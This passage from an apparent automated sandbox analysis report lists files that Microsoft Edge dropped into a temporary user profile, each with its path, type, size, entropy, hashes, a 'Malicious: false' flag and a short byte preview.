SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	171
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
MD5:	E952942B492DB39A75DD2669B98EBE74
SHA1:	F6C4DEF325DCA0DFEC01759D7D8610837A370176
SHA-256:	14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
SHA-512:	9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Scripts\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	267
Entropy (8bit):	5.134043844511657
Encrypted:	false
SSDEEP:	6:iOHvSD1wkn23fpEN6FB2KLldxlWM+q2Pwkn23fpEN65IFUv:76yfvFFLbL+vYfvWFUv
MD5:	E191F3802C49CA115F02E45D28CA47CA
SHA1:	53FE4433EE132F8414478D135F1DAF60BFE87B8F
SHA-256:	9E355A2D893EC163E63D687A6E21023743C3E59510797B71CCE8DCE0F04E64E4
SHA-512:	54008F848DA743A0237690AD41650C887F99122360C5B1891DC76FB02F6F4B83DBC0BB55CFB41C3F2EDB9ECF5F2C757D2184C1C068AD364BF184C84ED3AF1F49
Malicious:	false
Preview:	2025/01/05-02:32:33.460 4ac Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Scripts since it was missing..2025/01/05-02:32:33.490 4ac Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Scripts/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Scripts\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension State\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	513
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWWWWWWW
MD5:	C92EABB217D45C77F8D52725AD3758F0
SHA1:	43B422AC002BB445E2E9B2C27D74C27CD70C9975
SHA-256:	388C5C95F0F54F32B499C03A37AABFA5E0A31030EC70D0956A239942544B0EEA
SHA-512:	DFD5D1C614F0EBFF97F354DFC23266655C336B9B7112781D7579057814B4503D4B63AB1263258BDA3358E5EE9457429C1A2451B22261A1F1E2D8657F31240D3C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension State\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	265
Entropy (8bit):	5.178458116704634
Encrypted:	false
SSDEEP:	6:iOHP6eSD1wkn23fpENYg2KLldUMK13+q2Pwkn23fpENNIFUv:7vKyfaLgMKV+vYf5FUv
MD5:	14A50ADF6D84DCED18852DF6C64FF858
SHA1:	16E5E7CA8800EF2A5FB0DCA4F7777C5A894B6989
SHA-256:	C3EA134EDAEFC4A8FEE8A48D23D5753B536A1D513D359B99DDA4D466E10A380E
SHA-512:	24862769940B254547E0A34F69AEF72009B96980322DB08C83B09C197F5699E33773DD3159E39E01522A962CF3A398B1DBED42F31F2646CBA42C85E372D7EDCE
Malicious:	false
Preview:	2025/01/05-02:32:36.983 167c Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension State since it was missing..2025/01/05-02:32:37.872 167c Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension State/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension State\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\ExtensionActivityComp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.3169096321222068
Encrypted:	false
SSDEEP:	3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
MD5:	2554AD7847B0D04963FDAE908DB81074
SHA1:	F84ABD8D05D7B0DFB693485614ECF5204989B74A
SHA-256:	F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
SHA-512:	13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\ExtensionActivityEdge

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.40981274649195937
Encrypted:	false
SSDEEP:	24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
MD5:	1A7F642FD4F71A656BE75B26B2D9ED79
SHA1:	51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
SHA-256:	B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
SHA-512:	FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Favicons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6975083372685086
Encrypted:	false
SSDEEP:	24:LLiZxh0GY/l1rWR1PmCx9fZjsBX+T6UwcE85fBmI:EBmw6fU1zBmI
MD5:	F5BBD8449A9C3AB28AC2DE45E9059B01
SHA1:	C569D730853C33234AF2402E69C19E0C057EC165
SHA-256:	825FF36C4431084C76F3D22CE0C75FA321EA680D1F8548706B43E60FCF5B566E
SHA-512:	96ACDED5A51236630A64FAE91B8FA9FAB43E22E0C1BCB80C2DD8D4829E03FBFA75AA6438053599A42EC4BBCF805BF0B1E6DFF9069B2BA182AD0BB30F2542FD3F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\GPUCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\GPUCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\GPUCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
Encrypted:	false
SSDEEP:	3:LsNlq:Ls3
MD5:	93EA41C3426B6B7DC4661DB4E366ACFB
SHA1:	A79A6A9E34404E6E6008282B29C8D23AC0DA56B3
SHA-256:	CB7D9101694A80701C1D86D855DDBE7ED3841B68F1985BD8ED48C73FF671C10E
SHA-512:	BFE75FA3BFDDBD9244501165CD1C69DC11FFFC64B0928A6EC5E76FEF3E93484B7A175B901143FE9B320FD6CE41859512EC8B8400F9B6CE221192CDC915C591A7
Malicious:	false
Preview:	............................................./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\History

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.33890226319329847
Encrypted:	false
SSDEEP:	12:TLMfly7aoxrRGcAkSQdC6ae1//fxEjkE/RFL2iFV1eHFxOUwa5qgufTsZ75fOSI:TLYcjr0+Pdajk+FZH1W6UwccI5fBI
MD5:	971F4C153D386AC7ED39363C31E854FC
SHA1:	339841CA0088C9EABDE4AACC8567D2289CCB9544
SHA-256:	B6468DA6EC0EAE580B251692CFE24620D39412954421BBFDECB13EF21BE7BC88
SHA-512:	1A4DD0C2BE163AAB3B81D63DEB4A7DB6421612A6CF1A5685951F86B7D5A40B67FC6585B7E52AA0CC20FF47349F15DFF0C9038086E3A7C78AE0FFBEE6D8AA7F7E
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	349
Entropy (8bit):	5.264640695742868
Encrypted:	false
SSDEEP:	6:iOHUjG1wkn23fpExage8Y55HEZzXELIx2KLldzm+q2Pwkn23fpExage8Y55HEZzl:709fMrcHEZrEkVLnm+vYfMrcHEZrELF2
MD5:	EAA408BF4582101D8FD9C51CB92E688B
SHA1:	7736E8E9EF68A5D566E7222FDC98998CAFFC811E
SHA-256:	ADB1DB5772D8AE6269CEEC1F4EDD5D4AB0E34AAEE7A1E9E270301906ACEAFE19
SHA-512:	4E6CBA4B329A83EC0BA03B329E7B1960A19DC87B0AD63A9DE655E3DE683FCB5CECCFBCBE17394B10D238E27E893C9759271F1083BBDCFCD9731E616AECF4373F
Malicious:	false
Preview:	2025/01/05-02:32:37.875 167c Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2025/01/05-02:32:37.924 167c Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	277
Entropy (8bit):	5.142447266281923
Encrypted:	false
SSDEEP:	6:iOHaj0q1wkn23fpExa2jM8B2KLldG4q2Pwkn23fpExa2jMGIFUv:76j01fMjFLpvYfMEFUv
MD5:	0CB3F0BBD8263DC308F9FAE2071D3118
SHA1:	DC558DDE8006C5A7953026C15A682D7BEAA4F481
SHA-256:	35A7942B6F568C7F43894846365EB7B6B1B91464D587A3E5CF90A65E6E67BDCD
SHA-512:	17831025BB9A00ED29B5B6D49BBF010CEBD1C6A4E32F8B8A411BCC63C9EA727D826C8EE06347F66C2326B12122BC898E2B10AD5562700B4E3FD4030177E85B98
Malicious:	false
Preview:	2025/01/05-02:32:35.352 1ed0 Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb since it was missing..2025/01/05-02:32:35.383 1ed0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Login Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network Action Predictor

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.40293591932113104
Encrypted:	false
